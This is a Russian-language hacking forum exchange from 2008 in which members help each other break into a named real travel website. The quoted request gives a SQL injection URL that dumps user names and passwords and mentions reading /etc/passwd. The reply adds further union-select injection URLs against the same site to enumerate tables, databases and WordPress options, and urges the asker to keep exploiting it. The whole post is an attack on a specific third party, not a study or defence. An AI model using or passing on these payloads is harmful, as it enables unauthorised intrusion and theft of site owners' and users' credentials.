24.08.2008, 00:57
|
|
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
С нами:
10260776
Репутация:
185
|
|
Сообщение от softrix
Подсобите в админку попасть ?
http://www.emirate.ru/cgi-bin/full_details.cgi?&id_tourist=21852&country=oae&id=-148+union+select+1,2,3,4,5,6,7,concat_ws(%27:%27,i d,name,password,status),9,10,11,12,13+from+_2.main _users--
Разрешено чтение файлов, но прочесть кроме /etc/passwd ниче не смог,
разрешена запись, но не найти директорию.
Есть пароли но ХЗ где админка !
такая вот тема  Там может и не быть админки конкретно у этого сайта. Я так понимаю что база к которой он привязан общается еще с десятком сайтов. Или же просто криворукий одмин навставлял 10000000 движков таблиц и всякой такой хрени, потому как там оч много баз и таблиц...
Код:
http://www.emirate.ru/subscribe.php?&sub=-25+uni on+selec t+1,table_name,3+from+information_schema.tables/* - Это для таблиц
http://www.emirate.ru/subscribe.php?&sub=-25+uni on+sele ct+1,table_schema,3+from+information_schema.tables/* - Это для имен Баз
Вот те линк на таблицы, дальше раскручивай сам, если есть желание.
Там даж вордпресс стоит =)
Код:
http://www.emirate.ru/subscribe.php?&s ub=-25+union+select+1,option_na me,option_value+from+wordpress.wp_options/*
_http://smart-journeys.com
Кароч если подрочить, можешь много всякого там накрутить)))
Удачи. Если че интересного найдешь отпишись. Интересно. а самому ковырять времени нету)
|
|
|